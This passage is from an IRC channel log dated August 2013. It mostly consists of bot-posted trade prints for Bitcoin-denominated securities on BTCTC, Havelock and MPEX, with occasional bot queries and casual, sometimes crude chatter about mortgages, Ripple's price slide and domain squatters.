= 0.4757 BTC [-] Aug 16 00:09:31 [BTCTC] [LABCOIN] 278 @ 0.001617 = 0.4495 BTC [-] Aug 16 00:09:32 [BTCTC] [LABCOIN] 2076 @ 0.001616 = 3.3548 BTC [-] Aug 16 00:09:33 [BTCTC] [LABCOIN] 1 @ 0.001606 BTC [-] Aug 16 00:09:34 [BTCTC] [LABCOIN] 8 @ 0.001605 = 0.0128 BTC [-] Aug 16 00:09:35 [BTCTC] [LABCOIN] 412 @ 0.001604 = 0.6608 BTC [-] Aug 16 00:09:37 [BTCTC] [LABCOIN] 2000 @ 0.001603 = 3.206 BTC [-] Aug 16 00:09:38 [BTCTC] [LABCOIN] 1300 @ 0.001602 = 2.0826 BTC [-] Aug 16 00:09:39 [BTCTC] [LABCOIN] 200 @ 0.001597 = 0.3194 BTC [-] Aug 16 00:09:39 [BTCTC] [LABCOIN] 1600 @ 0.001596 = 2.5536 BTC [-] Aug 16 00:09:40 [BTCTC] [LABCOIN] 334 @ 0.001592 = 0.5317 BTC [-] Aug 16 00:09:41 [BTCTC] [LABCOIN] 1072 @ 0.001591 = 1.7056 BTC [-] Aug 16 00:09:42 [BTCTC] [LABCOIN] 1600 @ 0.00159 = 2.544 BTC [-] Aug 16 00:09:43 [BTCTC] [LABCOIN] 252 @ 0.001588 = 0.4002 BTC [-] Aug 16 00:09:44 [BTCTC] [LABCOIN] 2020 @ 0.001587 = 3.2057 BTC [-] Aug 16 00:09:49 well, before the Olympics have not gone since Aug 16 00:09:49 [BTCTC] [BTC-BOND] 12 @ 0.009996 = 0.12 BTC [-] Aug 16 00:10:37 jcpham is in Romania probably casting in a porno mircea is directing. You know, to pay his mortgage. Aug 16 00:11:02 i feel like mircea_popescu's mortgage is paid by someone else Aug 16 00:12:50 http://motherboard.vice.com/blog/super-mario-meets-bitcoin-in-silvia-dal-dossos-1-up-fever Aug 16 00:12:51 Super Mario Meets Bitcoin in the Augmented Reality of "1 Up Fever" | Motherboard Aug 16 00:12:52 Mortgage? I thought he was in an appartment Aug 16 00:13:07 dunno shrug. mircea is privileged Aug 16 00:13:17 i'm sure he has people that handle these things for him Aug 16 00:13:18 jcpham, lol what? Aug 16 00:13:26 (Super mario thing) Aug 16 00:13:29 dunno Aug 16 00:20:13 jcpham i never took a mortgage. Aug 16 00:20:43 i don't do secured loans. if the bank can't do it's dd i'm not interested in dealing with it. Aug 16 00:22:23 [BTCTC] [TAT.ASICMINER] 5 @ 0.04019 = 0.201 BTC [-] Aug 16 00:24:04 [BTCTC] [DMS.MINING] 13 @ 0.003 = 0.039 BTC [-] Aug 16 00:25:44 [MPEX] [S.MPOE] 8700 @ 0.0008653 = 7.5281 BTC [+] Aug 16 00:25:45 [BTCTC] [BTC-GROWTH] 30 @ 0.1 = 3 BTC [+] Aug 16 00:27:04 [BTCTC] [BTC-GROWTH] 19 @ 0.1 = 1.9 BTC [+] Aug 16 00:28:26 [BTCTC] [RSM] 10 @ 0.01247 = 0.1247 BTC [-] Aug 16 00:30:05 [BTCTC] [BTC-GROWTH] 141 @ 0.1 = 14.1 BTC [+] Aug 16 00:31:50 [BTCTC] [BTC-GROWTH] 7 @ 0.1 = 0.7 BTC [+] Aug 16 00:32:31 [BTCTC] [BTC-GROWTH] 5 @ 0.1 = 0.5 BTC [+] Aug 16 00:33:09 [BTCTC] [TAT.ASICMINER] 12 @ 0.04 = 0.48 BTC [-] Aug 16 00:38:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.04025 BTC [+] Aug 16 00:46:43 [BTCTC] [DMS.MINING] 7 @ 0.002865 = 0.0201 BTC [-] Aug 16 00:49:30 [HAVELOCK] [AM100] 5 @ 0.0387 = 0.1935 BTC [-] Aug 16 00:51:38 [BTCTC] [BTC-GROWTH] 15 @ 0.1 = 1.5 BTC [+] Aug 16 00:51:44 .d Aug 16 00:51:44 50810339.04828 | Next Diff in 1656 blocks | Estimated Change: 16.0853% in 9d 15h 34m 45s Aug 16 00:51:50 ;;nethash Aug 16 00:51:51 416907.644326 Aug 16 00:52:00 whoa Aug 16 00:52:14 !last btctc DMS.SELLING Aug 16 00:52:15 Last trade for DMS.SELLING on BTCTC was at 0.01804 BTC [-] Aug 16 00:52:54 [BTCTC] [TAT.ASICMINER] 41 @ 0.04 = 1.64 BTC [-] Aug 16 00:53:25 [BTCTC] [ACTIVEMINING] 8 @ 0.005413 = 0.0433 BTC [-] Aug 16 00:54:31 [BTCTC] [NASTY-PT] 3 @ 0.00425 = 0.0128 BTC [-] Aug 16 00:54:32 [BTCTC] [NASTY-PT] 50 @ 0.004201 = 0.2101 BTC [-] Aug 16 00:54:34 [BTCTC] [NASTY-PT] 300 @ 0.0041 = 1.23 BTC [-] Aug 16 00:54:35 [BTCTC] [NASTY-PT] 1 @ 0.004005 BTC [-] Aug 16 00:54:36 [BTCTC] [NASTY-PT] 10 @ 0.004005 = 0.0401 BTC [-] Aug 16 00:54:37 [BTCTC] [NASTY-PT] 10 @ 0.004001 = 0.04 BTC [-] Aug 16 00:54:39 [BTCTC] [NASTY-PT] 50 @ 0.004001 = 0.2001 BTC [-] Aug 16 00:54:41 [HAVELOCK] [AM100] 1 @ 0.0387 BTC [-] Aug 16 00:56:43 [BTCTC] [TAT.ASICMINER] 14 @ 0.03928 = 0.5499 BTC [-] Aug 16 00:58:27 [HAVELOCK] [AM100] 1 @ 0.038899 BTC [+] Aug 16 00:58:58 [HAVELOCK] [XBOND] 38 @ 0.00105 = 0.0399 BTC [+] Aug 16 01:03:20 [BTCTC] [ACTIVEMINING] 8 @ 0.005403 = 0.0432 BTC [-] Aug 16 01:07:59 [BTCTC] [BTC-GROWTH] 4 @ 0.1 = 0.4 BTC [+] Aug 16 01:09:00 [HAVELOCK] [HIM] 45 @ 0.2089 = 9.4005 BTC [+] Aug 16 01:09:30 It keeps sliding; 40K XRP per BTC now Aug 16 01:10:06 Wow, that is plummeting Aug 16 01:10:10 not slipping Aug 16 01:10:53 you are right it is 40k now Aug 16 01:11:14 aww, and i thought it was going to take over. Aug 16 01:11:16 So, I sold my free ones at 6000 Aug 16 01:11:24 that was a good call Aug 16 01:11:35 i should listen to the btctalk shills pumping crap more! Aug 16 01:13:01 [BTCTC] [BTC-GROWTH] 100 @ 0.1 = 10 BTC [+] Aug 16 01:13:13 you cant have a mortgage on an apartment? Aug 16 01:15:47 what's plummeting? Aug 16 01:17:16 nipple ripples Aug 16 01:17:48 any reason? Aug 16 01:18:15 I am assuming everyone figured out it was a scam Aug 16 01:19:07 hehe Aug 16 01:19:09 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001152 BTC [+] Aug 16 01:21:23 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199 BTC [+] Aug 16 01:21:42 [HAVELOCK] [SMG] 11 @ 0.00018 = 0.002 BTC [-] Aug 16 01:21:45 [BTCTC] [BTC-GROWTH] 50 @ 0.1 = 5 BTC [+] Aug 16 01:22:19 [BTCTC] [CRYPTO-TRADE] 5 @ 0.199 = 0.995 BTC [+] Aug 16 01:23:11 [BTCTC] [BTC-GROWTH] 3 @ 0.1 = 0.3 BTC [+] Aug 16 01:23:47 [HAVELOCK] [SMG] 500 @ 0.000174 = 0.087 BTC [-] Aug 16 01:23:49 [HAVELOCK] [SMG] 1572 @ 0.0001731 = 0.2721 BTC [-] Aug 16 01:23:52 [HAVELOCK] [SMG] 100 @ 0.000173 = 0.0173 BTC [-] Aug 16 01:23:54 [HAVELOCK] [SMG] 10 @ 0.000173 = 0.0017 BTC [-] Aug 16 01:23:56 [HAVELOCK] [SMG] 337 @ 0.000173 = 0.0583 BTC [-] Aug 16 01:26:48 [HAVELOCK] [XBOND] 81 @ 0.00105 = 0.0851 BTC [+] Aug 16 01:27:07 what was the command to check how many shares have been sold of X? Aug 16 01:27:14 [HAVELOCK] [XBOND] 6 @ 0.0010699 = 0.0064 BTC [+] Aug 16 01:28:51 [HAVELOCK] [XBOND] 53 @ 0.00107 = 0.0567 BTC [+] Aug 16 01:28:53 [HAVELOCK] [XBOND] 147 @ 0.001077 = 0.1583 BTC [+] Aug 16 01:29:04 [BTCTC] [DMS.SELLING] 9 @ 0.01799 = 0.1619 BTC [-] Aug 16 01:29:06 [HAVELOCK] [XBOND] 20 @ 0.001077 = 0.0215 BTC [+] Aug 16 01:29:20 [HAVELOCK] [XBOND] 7 @ 0.001077 = 0.0075 BTC [+] Aug 16 01:29:43 ticker? Aug 16 01:31:16 !ticker Havelock CFIG Aug 16 01:31:18 [HAVELOCK:CFIG] 1D: 0.15000000 / 0.15 / 0.15000000 (146 shares, 21.90000000 BTC), 7D: 0.15000000 / 0.15 / 0.15000000 (2682 shares, 402.30000000 BTC), 30D: 0.15000000 / 0.15 / 0.15000000 (2682 shares, 402.30000000 BTC) Aug 16 01:31:21 thanks Aug 16 01:32:53 [BTCTC] [CRYPTO-TRADE] 2 @ 0.199 = 0.398 BTC [+] Aug 16 01:34:51 [HAVELOCK] [AM100] 8 @ 0.038899 = 0.3112 BTC [+] Aug 16 01:42:12 [HAVELOCK] [HIM] 10 @ 0.2089 = 2.089 BTC [+] Aug 16 01:46:00 [HAVELOCK] [HIM] 63 @ 0.2089 = 13.1607 BTC [+] Aug 16 01:52:31 [BTCTC] [BTC-GROWTH] 49 @ 0.1 = 4.9 BTC [+] Aug 16 01:55:53 [BTCTC] [DMS.PURCHASE] 10 @ 0.0201 = 0.201 BTC [-] Aug 16 01:58:46 [BTCTC] [TAT.ASICMINER] 5 @ 0.04013 = 0.2007 BTC [+] Aug 16 02:01:42 [BTCTC] [LABCOIN] 1 @ 0.001617 BTC [+] Aug 16 02:01:52 [BTCTC] [DMS.SELLING] 439 @ 0.01799 = 7.8976 BTC [-] Aug 16 02:08:26 [BTCTC] [DMS.MINING] 2 @ 0.002999 = 0.006 BTC [+] Aug 16 02:08:55 [HAVELOCK] [XBOND] 10 @ 0.001075 = 0.0108 BTC [-] Aug 16 02:09:04 [BTCTC] [ACTIVEMINING] 3 @ 0.005414 = 0.0162 BTC [+] Aug 16 02:09:29 [HAVELOCK] [SDSTM] 1 @ 0.0062608 BTC [-] Aug 16 02:09:50 .d Aug 16 02:09:51 50810339.04828 | Next Diff in 1649 blocks | Estimated Change: 15.7254% in 9d 15h 27m 23s Aug 16 02:09:56 ;;nethash Aug 16 02:09:57 419320.734047 Aug 16 02:09:58 [HAVELOCK] [XBOND] 1 @ 0.0010839 BTC [+] Aug 16 02:10:50 [HAVELOCK] [XBOND] 20 @ 0.0010839 = 0.0217 BTC [+] Aug 16 02:11:31 [HAVELOCK] [XBOND] 33 @ 0.0010484 = 0.0346 BTC [-] Aug 16 02:12:41 [BTCTC] [DMS.SELLING] 100 @ 0.01805 = 1.805 BTC [+] Aug 16 02:13:55 [BTCTC] [ASICMINER-PT] 1 @ 3.864 BTC [-] Aug 16 02:14:48 [MPEX] [S.MPOE] 11916 @ 0.00086829 = 10.3465 BTC [+] Aug 16 02:19:00 [HAVELOCK] [XBOND] 40 @ 0.001049 = 0.042 BTC [+] Aug 16 02:19:02 [HAVELOCK] [XBOND] 603 @ 0.0010484 = 0.6322 BTC [-] Aug 16 02:19:26 [HAVELOCK] [XBOND] 40 @ 0.0010484 = 0.0419 BTC [-] Aug 16 02:19:29 [HAVELOCK] [XBOND] 1 @ 0.0010483 BTC [-] Aug 16 02:19:31 [HAVELOCK] [XBOND] 16 @ 0.001045 = 0.0167 BTC [-] Aug 16 02:19:33 [HAVELOCK] [XBOND] 23 @ 0.001044 = 0.024 BTC [-] Aug 16 02:21:34 [BTCTC] [LABCOIN] 10 @ 0.001605 = 0.0161 BTC [-] Aug 16 02:21:50 [HAVELOCK] [AM100] 25 @ 0.038899 = 0.9725 BTC [+] Aug 16 02:24:02 [BTCTC] [BTC-GROWTH] 10 @ 0.1 = 1 BTC [+] Aug 16 02:24:42 Does this get a live feed from all the major exchanges? Aug 16 02:24:48 Nice to see BTCTC and Havelock Aug 16 02:25:10 BF needs to be on there too Aug 16 02:25:18 tell ukyo Aug 16 02:28:23 [BTCTC] [ASICMINER-PT] 3 @ 3.864 = 11.592 BTC [-] Aug 16 02:28:42 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.001152 = 0.0023 BTC [+] Aug 16 02:29:50 is there a chan like this for LTC-Global? Aug 16 02:30:57 Not to my knowledge, i didn't even know this was here till today Aug 16 02:31:49 it's secret shhh Aug 16 02:37:29 lol Aug 16 02:37:43 [BTCTC] [LABCOIN] 84 @ 0.001659 = 0.1394 BTC [+] Aug 16 02:37:44 [BTCTC] [LABCOIN] 3 @ 0.00166 = 0.005 BTC [+] Aug 16 02:37:44 [BTCTC] [LABCOIN] 1 @ 0.001662 BTC [+] Aug 16 02:37:46 [BTCTC] [LABCOIN] 20 @ 0.001663 = 0.0333 BTC [+] Aug 16 02:46:40 [BTCTC] [DMS.MINING] 1 @ 0.0029 BTC [-] Aug 16 02:47:10 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.001152 = 0.0023 BTC [+] Aug 16 02:47:38 .d Aug 16 02:47:39 50810339.04828 | Next Diff in 1646 blocks | Estimated Change: 15.1930% in 9d 16h 32m 39s Aug 16 02:47:43 ;;nethash Aug 16 02:47:43 424054.931915 Aug 16 02:47:51 dude why is DMS.MINING going up Aug 16 02:47:59 that's retarded Aug 16 02:51:24 [BTCTC] [BITVPS] 3 @ 0.003299 = 0.0099 BTC [+] Aug 16 02:51:50 [BTCTC] [BTC-GROWTH] 15 @ 0.1 = 1.5 BTC [+] Aug 16 02:54:33 [BTCTC] [RSM] 4 @ 0.0111 = 0.0444 BTC [-] Aug 16 02:54:59 up up up Aug 16 02:55:09 [BTCTC] [ACTIVEMINING] 6 @ 0.005437 = 0.0326 BTC [+] Aug 16 02:55:11 [BTCTC] [ACTIVEMINING] 1 @ 0.005438 BTC [+] Aug 16 02:55:12 [BTCTC] [ACTIVEMINING] 40 @ 0.005449 = 0.218 BTC [+] Aug 16 02:55:13 [BTCTC] [ACTIVEMINING] 200 @ 0.00545 = 1.09 BTC [+] Aug 16 02:55:14 [BTCTC] [ACTIVEMINING] 1 @ 0.005459 BTC [+] Aug 16 02:55:15 [BTCTC] [ACTIVEMINING] 7 @ 0.00546 = 0.0382 BTC [+] Aug 16 02:55:16 [BTCTC] [ACTIVEMINING] 249 @ 0.005496 = 1.3685 BTC [+] Aug 16 02:55:16 [BTCTC] [ACTIVEMINING] 200 @ 0.005497 = 1.0994 BTC [+] Aug 16 02:55:18 [BTCTC] [ACTIVEMINING] 849 @ 0.0055 = 4.6695 BTC [+] Aug 16 02:55:19 [BTCTC] [ACTIVEMINING] 100 @ 0.0055 = 0.55 BTC [+] Aug 16 02:55:20 [BTCTC] [ACTIVEMINING] 100 @ 0.0055 = 0.55 BTC [+] Aug 16 02:55:21 [BTCTC] [ACTIVEMINING] 229 @ 0.005503 = 1.2602 BTC [+] Aug 16 02:55:22 [BTCTC] [RSM] 10 @ 0.0111 = 0.111 BTC [-] Aug 16 02:55:24 [BTCTC] [ACTIVEMINING] 18 @ 0.005504 = 0.0991 BTC [+] Aug 16 02:56:14 [BTCTC] [RSM] 15 @ 0.011 = 0.165 BTC [-] Aug 16 02:58:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.0395 BTC [-] Aug 16 03:04:22 [BTCTC] [ACTIVEMINING] 12 @ 0.00536 = 0.0643 BTC [-] Aug 16 03:05:20 [BTCTC] [TAT.ASICMINER] 14 @ 0.03997 = 0.5596 BTC [+] Aug 16 03:07:35 [BTCTC] [ACTIVEMINING] 12 @ 0.005497 = 0.066 BTC [+] Aug 16 03:07:36 [BTCTC] [ACTIVEMINING] 4 @ 0.005498 = 0.022 BTC [+] Aug 16 03:07:37 [BTCTC] [ACTIVEMINING] 50 @ 0.0055 = 0.275 BTC [+] Aug 16 03:07:38 [BTCTC] [ACTIVEMINING] 34 @ 0.005503 = 0.1871 BTC [+] Aug 16 03:08:40 [BTCTC] [LABCOIN] 10 @ 0.001625 = 0.0163 BTC [-] Aug 16 03:15:10 [HAVELOCK] [AM100] 1 @ 0.038899 BTC [+] Aug 16 03:17:31 [BTCTC] [ACTIVEMINING] 68 @ 0.005405 = 0.3675 BTC [-] Aug 16 03:17:32 [BTCTC] [ACTIVEMINING] 30 @ 0.005404 = 0.1621 BTC [-] Aug 16 03:18:44 [BTCTC] [ACTIVEMINING] 2 @ 0.005402 = 0.0108 BTC [-] Aug 16 03:20:30 [BTCTC] [ACTIVEMINING] 2 @ 0.005399 = 0.0108 BTC [-] Aug 16 03:20:40 [HAVELOCK] [XBOND] 1 @ 0.001057 BTC [+] Aug 16 03:21:49 [BTCTC] [ACTIVEMINING] 30 @ 0.005399 = 0.162 BTC [-] Aug 16 03:21:51 [BTCTC] [ACTIVEMINING] 12 @ 0.0054 = 0.0648 BTC [+] Aug 16 03:22:02 [BTCTC] [ASICMINER-PT] 1 @ 3.922 BTC [+] Aug 16 03:22:20 should have bought more XBOND Aug 16 03:22:59 why bother Aug 16 03:23:04 according to the fuckosphere Aug 16 03:23:08 bitcoin is going to be illegal Aug 16 03:23:09 [HAVELOCK] [AM100] 16 @ 0.038899 = 0.6224 BTC [+] Aug 16 03:23:13 and anyone caught with bitcoins will go to gitmo Aug 16 03:23:18 lol Aug 16 03:23:23 [HAVELOCK] [AM100] 77 @ 0.0391799 = 3.0169 BTC [+] Aug 16 03:23:44 [HAVELOCK] [AM100] 90 @ 0.03918 = 3.5262 BTC [+] Aug 16 03:24:52 [BTCTC] [TAT.ASICMINER] 41 @ 0.03987 = 1.6347 BTC [-] Aug 16 03:24:58 [BTCTC] [TAT.ASICMINER] 26 @ 0.03987 = 1.0366 BTC [-] Aug 16 03:24:59 [BTCTC] [TAT.ASICMINER] 24 @ 0.03988 = 0.9571 BTC [+] Aug 16 03:25:28 [BTCTC] [TAT.ASICMINER] 26 @ 0.03988 = 1.0369 BTC [+] Aug 16 03:26:06 [BTCTC] [TAT.ASICMINER] 10 @ 0.03989 = 0.3989 BTC [+] Aug 16 03:27:28 [BTCTC] [TAT.ASICMINER] 5 @ 0.03988 = 0.1994 BTC [-] Aug 16 03:29:33 [BTCTC] [LABCOIN] 10 @ 0.00162 = 0.0162 BTC [-] Aug 16 03:35:53 [BTCTC] [DMS.MINING] 99 @ 0.0029 = 0.2871 BTC [-] Aug 16 03:36:18 [BTCTC] [DMS.SELLING] 78 @ 0.01805 = 1.4079 BTC [+] Aug 16 03:36:38 ;;nethash Aug 16 03:36:39 424054.931915 Aug 16 03:40:56 [BTCTC] [BFMINES] 190 @ 0.0014 = 0.266 BTC [+] Aug 16 03:43:47 ;;nethash Aug 16 03:43:48 427465.814433 Aug 16 03:45:18 [BTCTC] [BTC-GROWTH] 1 @ 0.1 BTC [+] Aug 16 03:46:01 [BTCTC] [RSM] 3 @ 0.01051 = 0.0315 BTC [-] **** BEGIN LOGGING AT Fri Aug 16 12:02:42 2013 Aug 16 12:02:50 [BTCTC] [DMS.SELLING] 1 @ 0.01778 BTC [-] Aug 16 12:02:52 [BTCTC] [DMS.SELLING] 400 @ 0.01777 = 7.108 BTC [-] Aug 16 12:02:53 [BTCTC] [DMS.SELLING] 500 @ 0.01776 = 8.88 BTC [-] Aug 16 12:02:55 [BTCTC] [BTC-GROWTH] 36 @ 0.1 = 3.6 BTC [+] Aug 16 12:03:09 [BTCTC] [BTC-GROWTH] 15 @ 0.1 = 1.5 BTC [+] Aug 16 12:03:49 [BTCTC] [DMS.SELLING] 10 @ 0.01774 = 0.1774 BTC [-] Aug 16 12:03:51 [BTCTC] [DMS.SELLING] 100 @ 0.01773 = 1.773 BTC [-] Aug 16 12:03:52 [BTCTC] [DMS.SELLING] 1000 @ 0.01771 = 17.71 BTC [-] Aug 16 12:05:51 [BTCTC] [DMS.PURCHASE] 900 @ 0.0208 = 18.72 BTC [+] Aug 16 12:06:47 [BTCTC] [ASICMINER-PT] 3 @ 3.8 = 11.4 BTC [-] Aug 16 12:21:59 [BTCTC] [ACTIVEMINING] 15 @ 0.005315 = 0.0797 BTC [+] Aug 16 12:22:42 [BTCTC] [ASICMINER-PT] 1 @ 3.9 BTC [+] Aug 16 12:25:43 [BTCTC] [LABCOIN] 30 @ 0.001659 = 0.0498 BTC [-] Aug 16 12:25:44 [BTCTC] [LABCOIN] 1 @ 0.00166 BTC [+] Aug 16 12:25:45 [BTCTC] [LABCOIN] 4 @ 0.001687 = 0.0067 BTC [+] Aug 16 12:25:46 [BTCTC] [LABCOIN] 65 @ 0.001688 = 0.1097 BTC [+] Aug 16 12:36:39 [BTCTC] [DMS.MINING] 17 @ 0.003199 = 0.0544 BTC [+] Aug 16 12:37:14 [BTCTC] [DMS.MINING] 17 @ 0.0032 = 0.0544 BTC [+] Aug 16 12:39:24 [BTCTC] [ACTIVEMINING] 10 @ 0.005323 = 0.0532 BTC [+] Aug 16 12:45:20 [BTCTC] [NASTY-PT] 100 @ 0.00425 = 0.425 BTC [+] Aug 16 12:48:42 [HAVELOCK] [XBOND] 12 @ 0.0010552 = 0.0127 BTC [-] Aug 16 12:52:18 [BTCTC] [ASICMINER-PT] 1 @ 3.9 BTC [+] Aug 16 12:52:19 [BTCTC] [ASICMINER-PT] 17 @ 3.89 = 66.13 BTC [-] Aug 16 12:52:26 [BTCTC] [BTC-GROWTH] 6 @ 0.1 = 0.6 BTC [+] Aug 16 12:59:43 [BTCTC] [CRYPTO-TRADE] 3 @ 0.1961 = 0.5883 BTC [-] Aug 16 12:59:45 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1961 BTC [-] Aug 16 12:59:46 [BTCTC] [CRYPTO-TRADE] 9 @ 0.196 = 1.764 BTC [-] Aug 16 12:59:47 [BTCTC] [CRYPTO-TRADE] 10 @ 0.1955 = 1.955 BTC [-] Aug 16 12:59:49 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1951 BTC [-] Aug 16 12:59:50 [BTCTC] [CRYPTO-TRADE] 6 @ 0.195 = 1.17 BTC [-] Aug 16 12:59:51 [BTCTC] [CRYPTO-TRADE] 15 @ 0.195 = 2.925 BTC [-] Aug 16 13:00:36 [BTCTC] [ASICMINER-PT] 1 @ 3.89 BTC [-] Aug 16 13:00:36 [BTCTC] [ASICMINER-PT] 19 @ 3.88 = 73.72 BTC [-] Aug 16 13:06:20 [BTCTC] [LABCOIN] 2 @ 0.001659 = 0.0033 BTC [-] Aug 16 13:07:06 [HAVELOCK] [AM100] 2 @ 0.03761001 = 0.0752 BTC [+] Aug 16 13:08:37 [BTCTC] [TAT.ASICMINER] 29 @ 0.03899 = 1.1307 BTC [-] Aug 16 13:17:33 [HAVELOCK] [SDSTM] 3 @ 0.0062599 = 0.0188 BTC [+] Aug 16 13:24:25 [HAVELOCK] [AM100] 1 @ 0.03914999 BTC [+] Aug 16 13:32:35 [BTCTC] [BTC-GROWTH] 250 @ 0.1 = 25 BTC [+] Aug 16 13:32:46 [BTCTC] [BTC-GROWTH] 150 @ 0.1 = 15 BTC [+] Aug 16 13:38:16 [HAVELOCK] [SDSTM] 7 @ 0.0056104 = 0.0393 BTC [-] Aug 16 13:38:39 [HAVELOCK] [AM100] 1 @ 0.039 BTC [-] Aug 16 13:40:49 [BTCTC] [ASICMINER-PT] 1 @ 3.919 BTC [+] Aug 16 13:59:34 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001151 BTC [-] Aug 16 13:59:42 [BTCTC] [ASICMINER-PT] 2 @ 3.921 = 7.842 BTC [+] Aug 16 14:00:27 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.001152 = 0.0023 BTC [+] Aug 16 14:02:50 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.001151 = 0.0023 BTC [-] Aug 16 14:04:10 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.001151 = 0.0023 BTC [-] Aug 16 14:06:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.03841 BTC [-] Aug 16 14:07:59 [BTCTC] [TAT.ASICMINER] 44 @ 0.03841 = 1.69 BTC [-] Aug 16 14:09:00 [BTCTC] [BTC-GROWTH] 100 @ 0.1 = 10 BTC [+] Aug 16 14:09:19 [BTCTC] [DMS.MINING] 2 @ 0.00315 = 0.0063 BTC [-] Aug 16 14:10:14 [BTCTC] [DMS.MINING] 5 @ 0.003 = 0.015 BTC [-] Aug 16 14:13:22 [HAVELOCK] [LABCO] 1 @ 0.00175 BTC [-] Aug 16 14:15:07 [HAVELOCK] [AM100] 1 @ 0.0389 BTC [-] Aug 16 14:15:29 [BTCTC] [BTC-GROWTH] 29 @ 0.0992 = 2.8768 BTC [-] Aug 16 14:18:27 [BTCTC] [ACTIVEMINING] 35 @ 0.005312 = 0.1859 BTC [-] Aug 16 14:20:03 [BTCTC] [ACTIVEMINING] 7 @ 0.005312 = 0.0372 BTC [-] Aug 16 14:22:42 [BTCTC] [ACTIVEMINING] 117 @ 0.005312 = 0.6215 BTC [-] Aug 16 14:22:56 [BTCTC] [ACTIVEMINING] 130 @ 0.005312 = 0.6906 BTC [-] Aug 16 14:23:56 [BTCTC] [DMS.MINING] 7 @ 0.002952 = 0.0207 BTC [-] Aug 16 14:24:41 [BTCTC] [BTC-GROWTH] 3 @ 0.1 = 0.3 BTC [+] Aug 16 14:26:17 [BTCTC] [BTC-GROWTH] 4 @ 0.1 = 0.4 BTC [+] Aug 16 14:31:30 [BTCTC] [ACTIVEMINING] 235 @ 0.005313 = 1.2486 BTC [+] Aug 16 14:38:25 [HAVELOCK] [XBOND] 1 @ 0.0010551 BTC [-] Aug 16 14:41:27 [BTCTC] [LABCOIN] 25 @ 0.001659 = 0.0415 BTC [-] Aug 16 14:41:46 [BTCTC] [ACTIVEMINING] 7 @ 0.005313 = 0.0372 BTC [+] Aug 16 14:51:56 [BTCTC] [TAT.ASICMINER] 8 @ 0.039 = 0.312 BTC [+] Aug 16 14:52:12 [BTCTC] [TAT.ASICMINER] 33 @ 0.04 = 1.32 BTC [+] Aug 16 14:52:24 [BTCTC] [TAT.ASICMINER] 9 @ 0.04007 = 0.3606 BTC [+] Aug 16 14:53:08 [BTCTC] [TAT.ASICMINER] 44 @ 0.04006 = 1.7626 BTC [-] Aug 16 14:54:58 [BTCTC] [COGNITIVE] 1 @ 0.35 BTC [+] Aug 16 14:55:41 [BTCTC] [COGNITIVE] 1 @ 0.3222 BTC [-] Aug 16 14:55:42 [BTCTC] [COGNITIVE] 1 @ 0.3222 BTC [-] Aug 16 14:57:20 ;;later tell mircea_popescu are you being trolled? Aug 16 14:57:21 The operation succeeded. Aug 16 14:57:30 [BTCTC] [BASIC-MINING] 3 @ 0.3182 = 0.9546 BTC [+] Aug 16 14:57:40 ;;later tell mircea_popescu https://bitcointalk.org/index.php?topic=274465 Aug 16 14:57:40 The operation succeeded. Aug 16 14:59:35 deadweasel why me ? Aug 16 15:00:00 [HAVELOCK] [SDSTM] [PAID] 1.66300000 BTC to 100`000 shares, 1663 satoshi per share Aug 16 15:01:39 [BTCTC] [BASIC-MINING] 2 @ 0.3182 = 0.6364 BTC [+] Aug 16 15:02:21 [BTCTC] [TAT.ASICMINER] 67 @ 0.03855 = 2.5829 BTC [-] Aug 16 15:02:22 [BTCTC] [TAT.ASICMINER] 13 @ 0.03854 = 0.501 BTC [-] Aug 16 15:02:23 [BTCTC] [TAT.ASICMINER] 10 @ 0.03847 = 0.3847 BTC [-] Aug 16 15:02:25 [BTCTC] [TAT.ASICMINER] 50 @ 0.03846 = 1.923 BTC [-] Aug 16 15:02:40 ;;nethash Aug 16 15:02:41 426334.310757 Aug 16 15:02:56 would be more interesting for kakobrekla Aug 16 15:04:25 [BTCTC] [TAT.ASICMINER] 4 @ 0.04004 = 0.1602 BTC [+] Aug 16 15:05:39 [BTCTC] [DMS.MINING] 20 @ 0.003197 = 0.0639 BTC [+] Aug 16 15:05:41 [BTCTC] [DMS.MINING] 121 @ 0.003198 = 0.387 BTC [+] Aug 16 15:05:42 [BTCTC] [DMS.MINING] 57 @ 0.0032 = 0.1824 BTC [+] Aug 16 15:05:43 [BTCTC] [DMS.MINING] 99 @ 0.0032 = 0.3168 BTC [+] Aug 16 15:05:44 [BTCTC] [DMS.MINING] 200 @ 0.00322 = 0.644 BTC [+] Aug 16 15:05:45 [BTCTC] [DMS.MINING] 10 @ 0.003249 = 0.0325 BTC [+] Aug 16 15:05:46 [BTCTC] [DMS.MINING] 200 @ 0.00329 = 0.658 BTC [+] Aug 16 15:05:47 [BTCTC] [DMS.MINING] 299 @ 0.003295 = 0.9852 BTC [+] Aug 16 15:05:49 [BTCTC] [DMS.MINING] 15 @ 0.003297 = 0.0495 BTC [+] Aug 16 15:05:49 [BTCTC] [DMS.MINING] 186 @ 0.003298 = 0.6134 BTC [+] Aug 16 15:05:50 [BTCTC] [DMS.MINING] 80 @ 0.003299 = 0.2639 BTC [+] Aug 16 15:05:51 [BTCTC] [DMS.MINING] 200 @ 0.00333 = 0.666 BTC [+] Aug 16 15:08:53 [BTCTC] [DMS.MINING] 20 @ 0.003399 = 0.068 BTC [+] Aug 16 15:08:54 [BTCTC] [DMS.MINING] 127 @ 0.0034 = 0.4318 BTC [+] Aug 16 15:10:28 i imagine if he gave a shit at all he'd have just registered the lot when he did the com Aug 16 15:10:37 but normally... who cares, domain squatters. Aug 16 15:10:38 [HAVELOCK] [SDSTM] 72 @ 0.0060001 = 0.432 BTC [+] Aug 16 15:10:45 [HAVELOCK] [SDSTM] 130 @ 0.006 = 0.78 BTC [-] Aug 16 15:11:02 they're like bitcoin fake ipos, nobody ever gives them any money but they always keep right on hoping and making claims. Aug 16 15:11:23 [BTCTC] [TAT.ASICMINER] 5 @ 0.03997 = 0.1999 BTC [-] Aug 16 15:11:35 [HAVELOCK] [CFIG] 9 @ 